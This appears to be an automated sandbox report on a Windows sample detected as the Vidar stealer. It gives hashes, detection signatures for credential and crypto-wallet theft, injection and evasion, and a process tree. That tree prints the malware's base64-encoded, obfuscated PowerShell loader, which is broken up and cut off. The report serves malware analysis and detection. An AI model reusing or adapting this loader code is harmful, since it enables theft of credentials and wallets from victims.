Edit tour
Windows
Analysis Report
yU3icg18lq.exe
Overview
General Information
| Sample name: | yU3icg18lq.exerenamed because original name is a hash value |
| Original sample name: | 8b8db4eaa6f5368eb5f64359c6197b43.exe |
| Analysis ID: | 1416885 |
| MD5: | 8b8db4eaa6f5368eb5f64359c6197b43 |
| SHA1: | e9b51842e2d2f39fa06e466ae73af341ddffe1c8 |
| SHA256: | 55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77 |
| Tags: | 32exetrojan |
| Infos: |   |
 | |
Detection
Vidar
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Powershell dedcode and execute
Yara detected Vidar
Yara detected Vidar stealer
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Searches for specific processes (likely to inject)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
yU3icg18lq.exe (PID: 5144 cmdline: "C:\Users\ user\Deskt op\yU3icg1 8lq.exe" MD5: 8B8DB4EAA6F5368EB5F64359C6197B43) 
wscript.exe (PID: 4028 cmdline: "wscript.e xe" "C:\Us ers\user\s tart.vbs" MD5: FF00E0480075B095948000BDC66E81F0) 
cmd.exe (PID: 5512 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\tem p.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 808 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 5304 cmdline: "C:\Window s\SysWow64 \WindowsPo werShell\v 1.0\powers hell.exe" -command " [System.Te xt.Encodin g]::UTF8.G etString([ System.Con vert]::Fro mBase64Str ing('ZnVuY 3Rpb24gRGV jb21wcmVzc 0J5dGVzKCR jb21wcmVzc 2VkRGF0YSk geyAkbXMgP SBbSU8uTWV tb3J5U3RyZ WFtXTo6bmV 3KChbU3lzd GVtLkNvbnZ lcnRdOjpGc m9tQmFzZTY 0U3RyaW5nK CRjb21wcmV zc2VkRGF0Y SkpKTsgJG1 zLlBvc2l0a W9uID0gMDs gJGRlZmxhd GVTdHJlYW0 gPSBbSU8uQ 29tcHJlc3N pb24uRGVmb GF0ZVN0cmV hbV06Om5ld ygkbXMsIFt JTy5Db21wc mVzc2lvbi5 Db21wcmVzc 2lvbk1vZGV dOjpEZWNvb XByZXNzKTs gJGJ1ZmZlc iA9IFtieXR lW11dOjpuZ XcoNDA5Nik 7ICRtcyA9I FtJTy5NZW1 vcnlTdHJlY W1dOjpuZXc oKTsgd2hpb GUgKCR0cnV lKSB7ICRjb 3VudCA9ICR kZWZsYXRlU 3RyZWFtLlJ lYWQoJGJ1Z mZlciwgMCw gJGJ1ZmZlc i5MZW5ndGg pOyBpZiAoJ GNvdW50IC1 lcSAwKSB7I GJyZWFrIH0 gJG1zLldya XRlKCRidWZ mZXIsIDAsI CRjb3VudCk gfSAkZGVmb GF0ZVN0cmV hbS5DbG9zZ SgpOyAkbXM uVG9BcnJhe SgpIH0NCg0 KZnVuY3Rpb 24gUmV2ZXJ zZVN0cmluZ ygkaW5wdXR TdHJpbmcpI HsNCiAgICA kY2hhckFyc mF5ID0gJGl ucHV0U3Rya W5nLlRvQ2h hckFycmF5K CkgICMgQ29 udmVydCBzd HJpbmcgdG8 gY2hhcmFjd GVyIGFycmF 5DQogICAgJ HJldmVyc2V kQXJyYXkgP SAkY2hhckF ycmF5Wy0xL i4tKCRjaGF yQXJyYXkuT GVuZ3RoKV0 gICMgUmV2Z XJzZSB0aGU gYXJyYXkNC iAgICAkcmV 2ZXJzZWRTd HJpbmcgPSA tam9pbiAkc mV2ZXJzZWR BcnJheSAgI yBDb252ZXJ 0IHRoZSByZ XZlcnNlZCB hcnJheSBiY WNrIHRvIGE gc3RyaW5nD QogICAgcmV 0dXJuICRyZ XZlcnNlZFN 0cmluZw0Kf Q0KDQpmdW5 jdGlvbiBDb G9zZS1Qcm9 jZXNzIHsNC iAgICBwYXJ hbSgNCiAgI CAgICAgW3N 0cmluZ10kU HJvY2Vzc05 hbWUNCiAgI CApDQoNCiA gICAkcHJvY 2VzcyA9IEd ldC1Qcm9jZ XNzIC1OYW1 lICRQcm9jZ XNzTmFtZSA tRXJyb3JBY 3Rpb24gU2l sZW50bHlDb 250aW51ZQ0 KDQogICAga WYgKCRwcm9 jZXNzIC1uZ SAkbnVsbCk gew0KICAgI CAgICBTdG9 wLVByb2Nlc 3MgLU5hbWU gJFByb2Nlc 3NOYW1lIC1 Gb3JjZQ0KC X0NCn0NCg0 KZnVuY3Rpb 24gQ29udmV ydC1Bc2Npa VRvU3RyaW5 nKCRhc2Npa UFycmF5KXs NCiRvZmZTZ XRJbnRlZ2V yPTEyMzsNC iRkZWNvZGV kU3RyaW5nP SROdWxsOw0 KZm9yZWFja CgkYXNjaWl JbnRlZ2VyI GluICRhc2N paUFycmF5K XskZGVjb2R lZFN0cmluZ ys9W2NoYXJ dKCRhc2Npa UludGVnZXI tJG9mZlNld EludGVnZXI pfTsNCnJld HVybiAkZGV jb2RlZFN0c mluZ307DQo NCg0KJGVuY 29kZWRBcnJ heSA9IEAoM TU5LDIyMCw yMzgsMjM4L DIyNCwyMzI sMjIxLDIzM SwyNDQsMTY 5LDE5MiwyM zMsMjM5LDI zNywyNDQsM jAzLDIzNCw yMjgsMjMzL DIzOSwxNjk sMTk2LDIzM ywyNDEsMjM 0LDIzMCwyM jQsMTYzLDE 1OSwyMzMsM jQwLDIzMSw yMzEsMTY3L DE1OSwyMzM sMjQwLDIzM SwyMzEsMTY 0LDE4MikNC iRkZWNvZGV kU3RyaW5nI D0gQ29udmV ydC1Bc2Npa VRvU3RyaW5 nICRlbmNvZ GVkQXJyYXk NCg0KDQokZ mlsZVBhdGg gPSBKb2luL VBhdGggJGV udjpVc2VyU HJvZmlsZSA iLXRlbXAuY mF0Ig0KJGx hc3RMaW5lI D0gR2V0LUN vbnRlbnQgL VBhdGggJGZ pbGVQYXRoI HwgU2VsZWN 0LU9iamVjd CAtTGFzdCA xDQokY2xlY W5lZExpbmU gPSAkbGFzd ExpbmUgLXJ lcGxhY2UgJ 146OicNCiR yZXZlcnNlI D0gUmV2ZXJ zZVN0cmluZ yAkY2xlYW5 lZExpbmUNC iRkZWNvbXB